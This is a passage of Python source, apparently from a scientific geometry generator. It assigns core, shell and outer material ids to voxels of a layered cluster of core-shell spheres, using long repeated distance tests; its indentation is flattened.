if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx26/(div))**2+(yy26/(div))**2+(zz26/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx27/(div))**2+(yy27/(div))**2+(zz27/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx28/(div))**2+(yy28/(div))**2+(zz28/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx29/(div))**2+(yy29/(div))**2+(zz29/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx30/(div))**2+(yy30/(div))**2+(zz30/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx31/(div))**2+(yy31/(div))**2+(zz31/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx32/(div))**2+(yy32/(div))**2+(zz32/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx33/(div))**2+(yy33/(div))**2+(zz33/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx34/(div))**2+(yy34/(div))**2+(zz34/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx35/(div))**2+(yy35/(div))**2+(zz35/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx36/(div))**2+(yy36/(div))**2+(zz36/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx37/(div))**2+(yy37/(div))**2+(zz37/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx38/(div))**2+(yy38/(div))**2+(zz38/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx39/(div))**2+(yy39/(div))**2+(zz39/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx40/(div))**2+(yy40/(div))**2+(zz40/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx41/(div))**2+(yy41/(div))**2+(zz41/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx42/(div))**2+(yy42/(div))**2+(zz42/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx43/(div))**2+(yy43/(div))**2+(zz43/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx44/(div))**2+(yy44/(div))**2+(zz44/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx45/(div))**2+(yy45/(div))**2+(zz45/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx46/(div))**2+(yy46/(div))**2+(zz46/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx47/(div))**2+(yy47/(div))**2+(zz47/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx48/(div))**2+(yy48/(div))**2+(zz48/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx49/(div))**2+(yy49/(div))**2+(zz49/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx50/(div))**2+(yy50/(div))**2+(zz50/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx51/(div))**2+(yy51/(div))**2+(zz51/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx52/(div))**2+(yy52/(div))**2+(zz52/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx53/(div))**2+(yy53/(div))**2+(zz53/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx54/(div))**2+(yy54/(div))**2+(zz54/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx55/(div))**2+(yy55/(div))**2+(zz55/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx56/(div))**2+(yy56/(div))**2+(zz56/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx57/(div))**2+(yy57/(div))**2+(zz57/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
return A
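# A minimal sketch of the three-way core/shell/outer test that is repeated above for
# every sphere centre.  It assumes radiuscore + (radiusc - radiuscore) == radiusc, as
# written in the conditions, and it is not called by the hex* functions in this file;
# the name classify_voxel is only illustrative.
def classify_voxel(cc, radiusc, radiuscore, radiusshell,
                   corenumber, shellnumber, cnum, current):
    """Return the material id for a voxel whose normalised squared distance is cc."""
    rc2 = (float(radiuscore) / float(radiusc)) ** 2    # squared normalised core radius
    rs2 = (float(radiusshell) / float(radiusc)) ** 2   # squared normalised shell radius
    if cc <= rc2:
        return corenumber                # inside the core
    if rc2 <= cc <= rs2:
        return shellnumber               # between core and shell surfaces
    if rs2 <= cc <= 1.0:
        return cnum                      # between shell surface and full radius
    return current                       # outside the sphere: keep the old value
# usage sketch, per centre:
#     A[a][b] = classify_voxel(cc, radiusc, radiuscore, radiusshell,
#                              corenumber, shellnumber, cnum, A[a][b])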
###########################################################################################################################
###########################################################################################################################
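# hex7: same per-voxel core/shell test as hex6, applied to a 26-sphere cluster:
# a base layer of 19 centres at z = radiusc/dl topped by layers of 4, 2 and 1
# centres at z = (1+sqrt(3)), (1+2*sqrt(3)) and (1+3*sqrt(3)) times radiusc/dl.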
def hex7 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs):
for k in range(zini,zfin+1):
for j in range(yini,yfin+1):
for i in range(xini,xfin+1):
a=int(i)
b=int(j+(k-1)*Dy1)
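    # a,b: same grid-to-matrix index mapping as in hex6 (b = j + (k-1)*Dy1)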
xx1=((6)*radiusc/dl-i+1)
yy1= ((6)*radiusc/dl-j+1)
zz1=(radiusc/dl-k+1)
xx2=((6-1.0)*radiusc/dl-i+1)
yy2= ((6-sqrt(3.0))*radiusc/dl-j+1)
zz2=(radiusc/dl-k+1)
xx3=((6+1.0)*radiusc/dl-i+1)
yy3= ((6-sqrt(3.0))*radiusc/dl-j+1)
zz3=(radiusc/dl-k+1)
xx4=((6-1.0)*radiusc/dl-i+1)
yy4= ((6+sqrt(3.0))*radiusc/dl-j+1)
zz4=(radiusc/dl-k+1)
xx5=((6+1.0)*radiusc/dl-i+1)
yy5= ((6+sqrt(3.0))*radiusc/dl-j+1)
zz5=(radiusc/dl-k+1)
xx6=(4*radiusc/dl-i+1)
yy6= (6*radiusc/dl-j+1)
zz6=(radiusc/dl-k+1)
xx7=(8*radiusc/dl-i+1)
yy7= (6*radiusc/dl-j+1)
zz7=(1*radiusc/dl-k+1)
xx8=((6)*radiusc/dl-i+1)
yy8= ((8+sqrt(2.0))*radiusc/dl-j+1)
zz8=(1*radiusc/dl-k+1)
xx9=((6)*radiusc/dl-i+1)
yy9= ((4-sqrt(2.0))*radiusc/dl-j+1)
zz9=(1*radiusc/dl-k+1)
xx10=((10.0)*radiusc/dl-i+1)
yy10= ((6.0)*radiusc/dl-j+1)
zz10=(1*radiusc/dl-k+1)
xx11=((3-1.0)*radiusc/dl-i+1)
yy11= ((6.0)*radiusc/dl-j+1)
zz11=(1*radiusc/dl-k+1)
xx12=((3)*radiusc/dl-i+1)
yy12= ((6-sqrt(3.0))*radiusc/dl-j+1)
zz12=(1*radiusc/dl-k+1)
xx13=(9*radiusc/dl-i+1)
yy13= ((6-sqrt(3.0))*radiusc/dl-j+1)
zz13=(1*radiusc/dl-k+1)
xx14=((9+0.05)*radiusc/dl-i+1)
yy14= ((6+sqrt(3.0))*radiusc/dl-j+1)
zz14=(1*radiusc/dl-k+1)
xx15=((3)*radiusc/dl-i+1)
yy15= ((6+sqrt(3.0))*radiusc/dl-j+1)
zz15=((1)*radiusc/dl-k+1)
xx16=((3+1+0.05)*radiusc/dl-i+1)
yy16= ((11-sqrt(3.0)+0.15)*radiusc/dl-j+1)
zz16=((1)*radiusc/dl-k+1)
xx17=((8)*radiusc/dl-i+1)
yy17= ((11-sqrt(3.0)+0.15)*radiusc/dl-j+1)
zz17=((1)*radiusc/dl-k+1)
xx18=((8)*radiusc/dl-i+1)
yy18= ((1+sqrt(3.0)-0.1)*radiusc/dl-j+1)
zz18=((1)*radiusc/dl-k+1)
xx19=((4)*radiusc/dl-i+1)
yy19= ((1+sqrt(3.0)-0.1)*radiusc/dl-j+1)
zz19=((1)*radiusc/dl-k+1)
    # second layer of sphere centres (4 centres at z = (1+sqrt(3))*radiusc/dl)
xx20=((5)*radiusc/dl-i+1)
yy20= ((6)*radiusc/dl-j+1)
zz20=((1+sqrt(3.0))*radiusc/dl-k+1)
xx21=((7.0)*radiusc/dl-i+1)
yy21= ((6.0)*radiusc/dl-j+1)
zz21=((1+sqrt(3.0))*radiusc/dl-k+1)
xx22=((6.0)*radiusc/dl-i+1)
yy22= ((7.0+sqrt(2.0)/2)*radiusc/dl-j+1)
zz22=((1+sqrt(3.0))*radiusc/dl-k+1)
xx23=((6)*radiusc/dl-i+1)
yy23= ((5-sqrt(2.0)/2)*radiusc/dl-j+1)
zz23=((1+sqrt(3.0))*radiusc/dl-k+1)
    # third layer of sphere centres (2 centres at z = (1+2*sqrt(3))*radiusc/dl)
xx24=((6.0)*radiusc/dl-i+1)
yy24= ((6.0-sqrt(3.0)/2)*radiusc/dl-j+1)
zz24=((1+2*sqrt(3.0))*radiusc/dl-k+1)
xx25=((6)*radiusc/dl-i+1)
yy25= ((6+sqrt(3.0)/2)*radiusc/dl-j+1)
zz25=((1+2*sqrt(3.0))*radiusc/dl-k+1)
    # fourth layer: single top sphere at z = (1+3*sqrt(3))*radiusc/dl
xx26=((6.0)*radiusc/dl-i+1)
yy26= ((6.0)*radiusc/dl-j+1)
zz26=((1+3*sqrt(3.0))*radiusc/dl-k+1)
div=float(radiusc)/float(dl)
cc=float(((xx1/(div))**2+(yy1/(div))**2+(zz1/(div))**2) )
# print (xx11,yy11,zz11,3+sqrt(3.0),float(radiusc/dl))
# print radiuscore,radiusshell,radiusc
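    # cc: normalised squared distance to sphere centre 1, as in hex6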
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx2/(div))**2+(yy2/(div))**2+(zz2/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx3/(div))**2+(yy3/(div))**2+(zz3/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx4/(div))**2+(yy4/(div))**2+(zz4/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx5/(div))**2+(yy5/(div))**2+(zz5/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx6/(div))**2+(yy6/(div))**2+(zz6/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx7/(div))**2+(yy7/(div))**2+(zz7/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx8/(div))**2+(yy8/(div))**2+(zz8/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx9/(div))**2+(yy9/(div))**2+(zz9/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx10/(div))**2+(yy10/(div))**2+(zz10/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx11/(div))**2+(yy11/(div))**2+(zz11/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
    # print('here')
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx12/(div))**2+(yy12/(div))**2+(zz12/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
